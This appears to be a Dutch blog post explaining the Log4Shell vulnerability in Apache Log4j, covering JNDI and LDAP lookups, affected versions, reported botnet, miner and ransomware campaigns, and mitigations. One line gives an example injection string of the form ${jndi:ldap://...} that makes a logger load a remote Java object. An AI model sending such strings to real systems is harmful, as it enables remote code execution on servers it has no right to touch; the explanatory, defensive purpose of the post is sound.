Inhoudsopgave[Zich verstoppen][Laten zien]
Eind november 2021 ontdekten we een grote dreiging voor cyberbeveiliging. Deze exploit zou mogelijk miljoenen computersystemen wereldwijd treffen.
Dit is een gids over de Log4j-kwetsbaarheid en hoe een over het hoofd geziene ontwerpfout meer dan 90% van 's werelds computerservices vatbaar maakte voor aanvallen.
Apache Log4j is een open-source Java-gebaseerd hulpprogramma voor logboekregistratie, ontwikkeld door de Apache Software Foundation. Oorspronkelijk geschreven door Ceki Gülcü in 2001, maakt het nu deel uit van Apache Logging Services, een project van de Apache Software Foundation.
Bedrijven over de hele wereld gebruiken de Log4j-bibliotheek om logging op hun applicaties mogelijk te maken. De Java-bibliotheek is zelfs zo alomtegenwoordig dat u deze kunt vinden in toepassingen van Amazon, Microsoft, Google en meer.
De prominente aanwezigheid van de bibliotheek betekent dat elke mogelijke fout in de code miljoenen computers bloot kan stellen aan hacking. Op 24 november 2021, a Cloud Security onderzoeker van Alibaba ontdekte een vreselijke fout.
De Log4j-kwetsbaarheid, ook wel bekend als Log4Shell, bestond sinds 2013 onopgemerkt. Door de kwetsbaarheid konden kwaadwillende actoren code uitvoeren op getroffen systemen waarop Log4j draait. Het werd openbaar gemaakt op 9 december 2021
Experts uit de industrie noemen de Log4Shell-fout the grootste kwetsbaarheid in het recente geheugen.
In de week na de publicatie van de kwetsbaarheid ontdekten cybersecurityteams miljoenen aanvallen. Sommige onderzoekers zagen zelfs een snelheid van meer dan honderd aanvallen per minuut.
Hoe werkt het?
Om te begrijpen waarom Log4Shell zo gevaarlijk is, moeten we begrijpen waartoe het in staat is.
De Log4Shell-kwetsbaarheid maakt willekeurige code-uitvoering mogelijk, wat in feite betekent dat een aanvaller elke opdracht of code op een doelcomputer kan uitvoeren.
Hoe bereikt het dit?
Eerst moeten we begrijpen wat de JNDI is.
De Java Naming and Directory Interface (JNDI) is een Java-service waarmee Java-programma's via een naam gegevens en bronnen kunnen ontdekken en opzoeken. Deze directoryservices zijn belangrijk omdat ze een georganiseerde set records bieden waar ontwikkelaars gemakkelijk naar kunnen verwijzen bij het maken van applicaties.
De JNDI kan verschillende protocollen gebruiken om toegang te krijgen tot een bepaalde directory. Een van deze protocollen is het Lightweight Directory Access Protocol of LDAP.
Bij het loggen van een string, log4j voert tekenreeksvervangingen uit wanneer ze uitdrukkingen van het formulier tegenkomen ${prefix:name}
.
Bijvoorbeeld Text: ${java:version}
kan worden geregistreerd als tekst: Java-versie 1.8.0_65. Dit soort vervangingen zijn gemeengoed.
We kunnen ook uitdrukkingen hebben zoals Text: ${jndi:ldap://example.com/file}
die het JNDI-systeem gebruikt om een Java-object van een URL te laden via het LDAP-protocol.
Dit laadt effectief de gegevens die van die URL komen in de machine. Elke potentiële hacker kan schadelijke code hosten op een openbare URL en wachten tot machines die Log4j gebruiken deze code loggen.
Aangezien de inhoud van logberichten door de gebruiker gecontroleerde gegevens bevat, kunnen hackers hun eigen JNDI-referenties invoegen die verwijzen naar LDAP-servers die zij beheren. Deze LDAP-servers kunnen vol staan met kwaadaardige Java-objecten die de JNDI via de kwetsbaarheid kan uitvoeren.
Wat dit nog erger maakt, is dat het niet uitmaakt of de applicatie een server-side of een client-side applicatie is.
Zolang er een manier is waarop de logger de kwaadaardige code van de aanvaller kan lezen, staat de toepassing open voor exploits.
Wie wordt er getroffen?
De kwetsbaarheid treft alle systemen en diensten die gebruikmaken van APache Log4j, met versies 2.0 tot en met 2.14.1.
Verschillende beveiligingsexperts melden dat de kwetsbaarheid invloed kan hebben op een aantal toepassingen die Java gebruiken.
De fout werd voor het eerst ontdekt in de Minecraft-videogame van Microsoft. Microsoft heeft er bij hun gebruikers op aangedrongen om hun Java-editie Minecraft-software te upgraden om elk risico te voorkomen.
Jen Easterly, de directeur van Cybersecurity and Infrastructure Security Agency (CISA), zegt dat leveranciers een grote verantwoordelijkheid om te voorkomen dat kwaadwillenden misbruik maken van deze kwetsbaarheid door eindgebruikers.
"Leveranciers moeten ook communiceren met hun klanten om ervoor te zorgen dat eindgebruikers weten dat hun product deze kwetsbaarheid bevat en moeten prioriteit geven aan software-updates."
De aanvallen zijn naar verluidt al begonnen. Symantec, een bedrijf dat cyberbeveiligingssoftware levert, heeft een wisselend aantal aanvalsverzoeken waargenomen.
Hier zijn enkele voorbeelden van de soorten aanvallen die onderzoekers hebben gedetecteerd:
- botnets
Botnets zijn een netwerk van computers die onder controle staan van één aanvallende partij. Ze helpen bij het uitvoeren van DDoS-aanvallen, het stelen van gegevens en andere vormen van oplichting. Onderzoekers observeerden het Muhstik-botnet in shell-scripts die waren gedownload van de Log4j-exploit.
- XMRig Miner-trojan
XMRig is een open-source cryptocurrency-miner die CPU's gebruikt om het Monero-token te minen. Cybercriminelen kunnen XMRig op de apparaten van mensen installeren, zodat ze hun verwerkingskracht zonder hun medeweten kunnen gebruiken.
- Khonsari-ransomware
Ransomware verwijst naar een vorm van malware die is ontworpen om bestanden versleutelen op een computer. Aanvallers kunnen dan betaling eisen in ruil voor het teruggeven van toegang tot de versleutelde bestanden. Onderzoekers ontdekten de Khonsari-ransomware in Log4Shell-aanvallen. Ze richten zich op Windows-servers en maken gebruik van het .NET-framework.
Wat gebeurt er nu?
Experts voorspellen dat het maanden of zelfs jaren kan duren om de chaos veroorzaakt door de Log4J-kwetsbaarheid volledig op te lossen.
Dit proces omvat het bijwerken van elk getroffen systeem met een gepatchte versie. Zelfs als al deze systemen zijn gepatcht, is er nog steeds de dreigende dreiging van mogelijke achterdeurtjes die hackers mogelijk al hebben toegevoegd aan het venster dat servers open stonden voor aanvallen.
Veel oplossingen en verzachtingen bestaan om te voorkomen dat applicaties worden misbruikt door deze bug. De nieuwe Log4j-versie 2.15.0-rc1 heeft verschillende instellingen gewijzigd om deze kwetsbaarheid te verminderen.
Alle functies die JNDI gebruiken, zijn standaard uitgeschakeld en ook op afstand zoeken is beperkt. Het uitschakelen van de opzoekfunctie in uw Log4j-configuratie helpt het risico op mogelijke exploits te verminderen.
Buiten Log4j is er nog steeds behoefte aan een breder plan om open-source exploits te voorkomen.
Eerder in mei bracht het Witte Huis een uitvoerende orde die tot doel had de nationale cyberbeveiliging te verbeteren. Het bevatte een voorziening voor een software stuklijst (SBOM), wat in wezen een formeel document was dat een lijst bevatte van elk item dat nodig was om de applicatie te bouwen.
Dit omvat onderdelen zoals de open source pakketten, afhankelijkheden en API's die worden gebruikt voor ontwikkeling. Hoewel het idee van SBOM's nuttig is voor transparantie, zal het de consument echt helpen?
Het upgraden van afhankelijkheden kan te veel gedoe zijn. Bedrijven kunnen er gewoon voor kiezen om eventuele boetes te betalen in plaats van het risico te lopen extra tijd te verspillen aan het zoeken naar alternatieve pakketten. Misschien zijn deze SBOM's alleen nuttig als hun omvang wordt verder beperkt.
Conclusie
Het Log4j-vraagstuk is meer dan alleen een technisch probleem voor organisaties.
Bedrijfsleiders moeten zich bewust zijn van mogelijke risico's die kunnen optreden wanneer hun servers, producten of diensten afhankelijk zijn van code die ze zelf niet onderhouden.
Vertrouwen op open-source en applicaties van derden brengt altijd een bepaald risico met zich mee. Bedrijven zouden moeten overwegen om risicobeperkende strategieën uit te werken voordat nieuwe bedreigingen aan het licht komen.
Een groot deel van het web is afhankelijk van open-sourcesoftware die wordt onderhouden door duizenden vrijwilligers over de hele wereld.
Als we het internet veilig willen houden, moeten overheden en bedrijven investeren in het financieren van open source-inspanningen en cyberbeveiligingsinstanties zoals CISA.
Laat een reactie achter